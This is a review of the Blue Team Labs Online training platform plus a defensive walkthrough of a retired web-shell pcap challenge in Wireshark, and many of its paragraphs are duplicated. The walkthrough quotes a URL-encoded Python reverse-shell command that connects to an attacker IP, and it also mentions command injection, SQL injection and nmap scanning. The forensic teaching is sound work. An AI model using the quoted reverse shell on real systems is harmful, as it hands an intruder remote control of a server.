BLUE TEAM LABS ONLINE
Author: Stefan Waldvogel
BTLO is a new blue training platform
Overview:
Blue Team Labs Online (BTLO) is a training platform for blue knowledge. You learn how to defend a company, and you get valuable skills. The platform has two areas: Challenges and investigations. You can start with the free challenges, and right now (May 2021), you have about 20 of them.
You have 2 free investigations and 30 in the pro version.
If you start your career, try the free versions and if you like it, do the paid content.
HR relevant:
no
Advantages:
One of the most significant advantages is the price. Many modules are free; therefore, you can sharpen your skills and get job-ready. Labs like BTLO offer hands-on knowledge and are based on actual incidents.
The website has a point system, and it motivates you to learn more.
Retired systems allow write-ups. Therefore you can learn very efficiently.
Disadvantages:
Very hard to find; maybe HR and companies do not know this new form of hands-on learning.
Pricing:
free, $30 a month for the pro labs
Recertification costs:
-none-
Website:
blueteamlabs.online/
Blue Team Labs Online (BTLO) is a training platform for blue knowledge. You learn how to defend a company, and you get valuable skills. The platform has two areas: Challenges and investigations. You can start with the free challenges, and right now (May 2021), you have about 20 of them.
You have 2 free investigations and 30 in the pro version.
If you start your career, try the free versions and if you like it, do the paid content.
HR relevant:
no
Advantages:
One of the most significant advantages is the price. Many modules are free; therefore, you can sharpen your skills and get job-ready. Labs like BTLO offer hands-on knowledge and are based on actual incidents.
The website has a point system, and it motivates you to learn more.
Retired systems allow write-ups. Therefore you can learn very efficiently.
Disadvantages:
Very hard to find; maybe HR and companies do not know this new form of hands-on learning.
Pricing:
free, $30 a month for the pro labs
Recertification costs:
-none-
Website:
blueteamlabs.online/
Small introduction
Do you want to know more about the style and quality? I will show you some details about the "Network Analysis -Web Shell" challenge. This module is retired, and write-ups are fine.
Hint: You find write-ups on the official website. I do not follow the questions it is more about what you do if you get a pcap file.
You find "Network Analysis - Web Shell" under Challenges:
Do you want to know more about the style and quality? I will show you some details about the "Network Analysis -Web Shell" challenge. This module is retired, and write-ups are fine.
Hint: You find write-ups on the official website. I do not follow the questions it is more about what you do if you get a pcap file.
You find "Network Analysis - Web Shell" under Challenges:
If you start the challenge, you get an excellent overview with a lot of information. You learn more about your goals, the situation, and the questions.
What is nice:
You can use any tool you like. This is a realistic scenario, and if you do not know any tools, you get three options:
Download the file and load it into Wireshark. You get a warning "This is real malware" -> always use a VM for your training.
If you use Ubuntu, Wireshark is not installed, install it with:
sudo apt update
sudo apt upgrade
sudo apt install wireshark
If you get an error with sudo not installed, switch the user with
sudo su
-> this is usually not recommended, but in a VM, it is okay.
Start Wireshark in a terminal with the command
wireshark
You see something like this:
You can use any tool you like. This is a realistic scenario, and if you do not know any tools, you get three options:
- Wireshark
- TCPDump
- TShark
Download the file and load it into Wireshark. You get a warning "This is real malware" -> always use a VM for your training.
If you use Ubuntu, Wireshark is not installed, install it with:
sudo apt update
sudo apt upgrade
sudo apt install wireshark
If you get an error with sudo not installed, switch the user with
sudo su
-> this is usually not recommended, but in a VM, it is okay.
Start Wireshark in a terminal with the command
wireshark
You see something like this:
If you use Wireshark the first time, try to understand the big picture. You see some network cards, and you can listen to the traffic.
Other options are available. One example: You can use Wireshark remote, and with SSH you log into a different system and collect the data.
Wireshark is mighty tool. This lab is a beginner lab; we use essential functions.
Import the pcap file
You can import the pcap under File -> Open. Here you have to pick the path. It should be under /home/{your user name}/Downloads
Other options are available. One example: You can use Wireshark remote, and with SSH you log into a different system and collect the data.
Wireshark is mighty tool. This lab is a beginner lab; we use essential functions.
Import the pcap file
You can import the pcap under File -> Open. Here you have to pick the path. It should be under /home/{your user name}/Downloads
If you open it, you see more information and about 17,000 rows. This is massive, you cannot real all rows and we need filters to find the wanted data.
Wireshark has build in tools to analyze the traffic so we can see the statistics.
The starting point
Scroll through the traffic and you notice HTTP traffic. This is great, because HTTP is un-encrypted. We can read the files, the traffic and if we can read it, Wireshark can read it, too. Let us look at line 14:
Wireshark has build in tools to analyze the traffic so we can see the statistics.
The starting point
Scroll through the traffic and you notice HTTP traffic. This is great, because HTTP is un-encrypted. We can read the files, the traffic and if we can read it, Wireshark can read it, too. Let us look at line 14:
This is a HTTP GET request. The machine with the IP 172.20.10.5 is asking a webserver on 172.20.10.2.
Something like this happens any time. These are two internal machines (class c network) and they talk to each other.
-> It is HTTP traffic, most likely many packets are connected. We can use Wireshark to see all related packets.
Right click on line 14 -> Follow -> HTTP Stream
Can you see something special? Do you understand the big picture?
Something like this happens any time. These are two internal machines (class c network) and they talk to each other.
-> It is HTTP traffic, most likely many packets are connected. We can use Wireshark to see all related packets.
Right click on line 14 -> Follow -> HTTP Stream
Can you see something special? Do you understand the big picture?
If you never saw such an output, there are lot of lines and it is overwhelming. What can we see:
We have two different colors (blue and red). One machine is blue and the second is red.
If you scroll around, you see input labels with password and username. This is important. A HTTP GET request transmits usernames and passwords un-encrypted.
Here it is a login field for a "Register Complaint" website.
If read the data, you might understand the idea. Someone used a blank username and password and wanted to download something and it failed. We got a 404 error message and a "unable to find users" message.
Is this malicious? Maybe, maybe not. We got a very specific message: "unable to find user" and with this message an attacker can enumerate users. Assume we have a correct user but the wrong password, it might say: "wrong password".
This is only one request, it could be someone just forgot the username.
If you do such labs, try to understand the bigger picture, especially if you never saw all the data. Most malicious traffic hides behind a ton of legit traffic.
Different approach with files
Wireshark is smart and detects documents and files. Go to File -> Export Objects -> HTTP
We have two different colors (blue and red). One machine is blue and the second is red.
If you scroll around, you see input labels with password and username. This is important. A HTTP GET request transmits usernames and passwords un-encrypted.
Here it is a login field for a "Register Complaint" website.
If read the data, you might understand the idea. Someone used a blank username and password and wanted to download something and it failed. We got a 404 error message and a "unable to find users" message.
Is this malicious? Maybe, maybe not. We got a very specific message: "unable to find user" and with this message an attacker can enumerate users. Assume we have a correct user but the wrong password, it might say: "wrong password".
This is only one request, it could be someone just forgot the username.
If you do such labs, try to understand the bigger picture, especially if you never saw all the data. Most malicious traffic hides behind a ton of legit traffic.
Different approach with files
Wireshark is smart and detects documents and files. Go to File -> Export Objects -> HTTP
Now, you see much more details. Scroll through the list and think. What looks suspicious and what is going on?
Download all the files to a folder and look around. Can you see something suspicious?
What about this:
Download all the files to a folder and look around. Can you see something suspicious?
What about this:
First row
The command whoami is a Linux command and most hackers use the command "whoami" to see the own level.
The answer could be wwwdata or maybe root.
The program is: dbfunctions.php
Someone can use dbfunctions.php to inject commands to the webserver. This is called "Command Injection" and a main problem. Use google if you want to learn more about this.
-> If you take certs like PenTest+ you need to know this.
One question is: Why is this program on this server? Is the function wanted or malicious? Such a feature is most likely not wanted.
Fifth row
This is a very long file name and word UNION is visible. This attack is called "Union Sql Injection." Many websites had this vulnerability.
Do you want to know more about such attacks? You find free training here: tryhackme.com/room/owaspjuiceshop
Again, if you take certs, you need to understand these attacks (and how to mitigate them).
We found two weird things.
We can sort the file and look for bigger files. In one of them, we see details about the dbfunctions.php file.
The command whoami is a Linux command and most hackers use the command "whoami" to see the own level.
The answer could be wwwdata or maybe root.
The program is: dbfunctions.php
Someone can use dbfunctions.php to inject commands to the webserver. This is called "Command Injection" and a main problem. Use google if you want to learn more about this.
-> If you take certs like PenTest+ you need to know this.
One question is: Why is this program on this server? Is the function wanted or malicious? Such a feature is most likely not wanted.
Fifth row
This is a very long file name and word UNION is visible. This attack is called "Union Sql Injection." Many websites had this vulnerability.
Do you want to know more about such attacks? You find free training here: tryhackme.com/room/owaspjuiceshop
Again, if you take certs, you need to understand these attacks (and how to mitigate them).
We found two weird things.
We can sort the file and look for bigger files. In one of them, we see details about the dbfunctions.php file.
This is .php allows an attacker to in inject commands.
How does it work?
An attacker finds a way to upload data to the server and uploads a new website, here dbfunctions.php. Now, the attacker can browse to this new website and can inject commands. This works, because user for this website is most likely wwwdata and executes the command on behalf of the attacker. If the wwwdata user has root rights, the attacker has full control about the machine.
If you go back to the questions for the challenge, you see some questions about this. If you do such labs, do more than just collect the points. Try to understand why things work and read or ask other students. Cybersecurity is about teamwork and networking.
Now, you should be able to answer the last questions. Sort the HTTP object list by Packet and you get:
What is the first command executed by the attacker? (1 points)
One question is tricky: "What is the name of the php file through which the attacker uploaded a web shell? (1 points)"
We saw the attacker used upload.php but this is not the wanted answer. BTLO wants the original website name.
We can use the find function under Edit.
Edit -> Find Packet
Now you get a new line and you have to select "String" and add the wanted word, here "upload.php"
How does it work?
An attacker finds a way to upload data to the server and uploads a new website, here dbfunctions.php. Now, the attacker can browse to this new website and can inject commands. This works, because user for this website is most likely wwwdata and executes the command on behalf of the attacker. If the wwwdata user has root rights, the attacker has full control about the machine.
If you go back to the questions for the challenge, you see some questions about this. If you do such labs, do more than just collect the points. Try to understand why things work and read or ask other students. Cybersecurity is about teamwork and networking.
Now, you should be able to answer the last questions. Sort the HTTP object list by Packet and you get:
What is the first command executed by the attacker? (1 points)
One question is tricky: "What is the name of the php file through which the attacker uploaded a web shell? (1 points)"
We saw the attacker used upload.php but this is not the wanted answer. BTLO wants the original website name.
We can use the find function under Edit.
Edit -> Find Packet
Now you get a new line and you have to select "String" and add the wanted word, here "upload.php"
The list is still huge, and we can add a second filter.
Files are uploaded with POST requests, and we can use the filter function.
http.request.method==POST
The list is a bit smaller; we have only two POST requests with /upload.php. In both files is the wanted answer in the "Referer" field. There are multiple ways to extract the data. I used "follow TCP stream" (right-click on one of these two files -> follow) to get the bigger picture.
Files are uploaded with POST requests, and we can use the filter function.
http.request.method==POST
The list is a bit smaller; we have only two POST requests with /upload.php. In both files is the wanted answer in the "Referer" field. There are multiple ways to extract the data. I used "follow TCP stream" (right-click on one of these two files -> follow) to get the bigger picture.
Try to find the easy answers alone.
The next more challenging question is: What type of shell is used?
Build a filter:
We know the attacker used dbfunctions.php to send commands.
The attacker IP is: 10.251.96.4 --> the filter is: ip.src==10.251.96.4
If we look closely, we see the commands are submitted via a GET request --> the filter is: http.request.method==GET
The && connects both commands:
ip.src==10.251.96.4 && http.request.method==GET
The next more challenging question is: What type of shell is used?
Build a filter:
We know the attacker used dbfunctions.php to send commands.
The attacker IP is: 10.251.96.4 --> the filter is: ip.src==10.251.96.4
If we look closely, we see the commands are submitted via a GET request --> the filter is: http.request.method==GET
The && connects both commands:
ip.src==10.251.96.4 && http.request.method==GET
One of these entries is very suspicious and contains a python script. Follow the data stream and try to understand the output.
It looks like this:
cmd=python%20c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.251.96.4%22,4422));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
It is not really readable, but we can use cyberchef to convert the string. The link is:
gchq.github.io/CyberChef/
Cyberchef is a very powerful tool and can do much more, but we want to use "URL Decode." Find the recipe and use drag and drop. Copy the string and it should look like this:
cmd=python%20c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.251.96.4%22,4422));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
It is not really readable, but we can use cyberchef to convert the string. The link is:
gchq.github.io/CyberChef/
Cyberchef is a very powerful tool and can do much more, but we want to use "URL Decode." Find the recipe and use drag and drop. Copy the string and it should look like this:
It looks much better. This kind of shell talks back to the attackers machine and is called reverse shell.
Try to find the other answer (port).
Bonus: One file has a base64 encoded thing it it. Find it, decode it and what is it.
Finish the other answers
One question is about tools. Most tools use the user_agent field to say "it is me" and therefore we can search for it. The search command could look like this:
ip.dst == 10.251.96.5 && http.user_agent
Try to find the other answer (port).
Bonus: One file has a base64 encoded thing it it. Find it, decode it and what is it.
Finish the other answers
One question is about tools. Most tools use the user_agent field to say "it is me" and therefore we can search for it. The search command could look like this:
ip.dst == 10.251.96.5 && http.user_agent
You can find one matching agent in many requests. The wanted tool does one thing: It searches for valid websites. Some are hidden, but the program tries hundreds.
We touched the second tool a while ago. Remember the UNION thing? That has something to do with SQL injections and hackers use automated tools.
We can open the Export HTTP object list again (File -> Export Objects -> HTTP) and if we click on the file with the UNION in it, Wireshark will jump to the file.
We touched the second tool a while ago. Remember the UNION thing? That has something to do with SQL injections and hackers use automated tools.
We can open the Export HTTP object list again (File -> Export Objects -> HTTP) and if we click on the file with the UNION in it, Wireshark will jump to the file.
Can you find both names and the version number?
What is with the port range?
Wireshark has a tool and you can answer this question right away. The tool is under Statistics -> Conversations -> TCP.
Just sort for the ports and you get it.
What type is it?
Select one scan and look for the right key words. One port scanner is nmap and the standard scan is a SYN scan. It could look like this nmap -p 1-1000 10.251.96.5
What is with the port range?
Wireshark has a tool and you can answer this question right away. The tool is under Statistics -> Conversations -> TCP.
Just sort for the ports and you get it.
What type is it?
Select one scan and look for the right key words. One port scanner is nmap and the standard scan is a SYN scan. It could look like this nmap -p 1-1000 10.251.96.5
Conclusion
I didn't follow the question on purpose because in the real world, you do not have questions. You see one interesting thing and you start your investigation.
Here, I highlighted the second part.
-> If you do a lab, you can follow the questions, but often you can find much more things. Do not limit your creativity because questions are a help, nothing more.
Bonus section
This is the bonus part and we play with RITA to find hidden stuff.
zeek -C -r BTLOPortScan.pcap
sudo rita import /home/stefanr/Downloads/BTLOlab* BTLO1
sudo rita html-report BTLO1
--> nothing interesting, it was just a try.
nano /etc/rita/config.yaml
I didn't follow the question on purpose because in the real world, you do not have questions. You see one interesting thing and you start your investigation.
Here, I highlighted the second part.
-> If you do a lab, you can follow the questions, but often you can find much more things. Do not limit your creativity because questions are a help, nothing more.
Bonus section
This is the bonus part and we play with RITA to find hidden stuff.
zeek -C -r BTLOPortScan.pcap
sudo rita import /home/stefanr/Downloads/BTLOlab* BTLO1
sudo rita html-report BTLO1
--> nothing interesting, it was just a try.
nano /etc/rita/config.yaml
© 2021. This work is licensed under a CC BY-SA 4.0 license